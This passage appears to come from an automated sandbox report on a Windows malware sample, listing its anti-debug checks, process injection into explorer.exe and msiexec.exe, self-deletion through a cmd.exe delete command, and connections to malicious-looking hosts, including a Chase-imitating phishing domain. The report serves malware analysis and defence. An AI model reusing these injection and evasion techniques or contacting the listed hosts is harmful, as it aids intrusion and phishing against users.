        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B73D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B73D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FFF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B8F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FEF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01367794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01367794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01367794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F8794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013237F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0139FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EE620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01318E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013646A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013116E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01328EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0139FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013136CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.221 80
        Source: C:\Windows\explorer.exeDomain query: www.whipbull.com
        Source: C:\Windows\explorer.exeNetwork Connect: 194.195.211.26 80
        Source: C:\Windows\explorer.exeDomain query: www.secure-id6793-chase.com
        Source: C:\Users\user\Desktop\0098764345678.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1130000
        Source: C:\Users\user\Desktop\0098764345678.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\0098764345678.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\0098764345678.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\0098764345678.exeThread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\0098764345678.exeThread register set: target process: 3968
        Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3968
        Source: C:\Users\user\Desktop\0098764345678.exeProcess created: C:\Users\user\Desktop\0098764345678.exe {path}
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\0098764345678.exe"
        Source: explorer.exe, 00000007.00000000.349310159.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.443159976.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.372845038.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
        Source: explorer.exe, 00000007.00000000.350405980.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.300805300.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.374372996.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000000.350405980.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.300805300.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.374372996.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000007.00000000.350405980.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.300805300.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.374372996.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000000.443197553.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.349657878.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.299659250.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
        Source: explorer.exe, 00000007.00000000.350405980.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.300805300.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.374372996.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Users\user\Desktop\0098764345678.exe VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
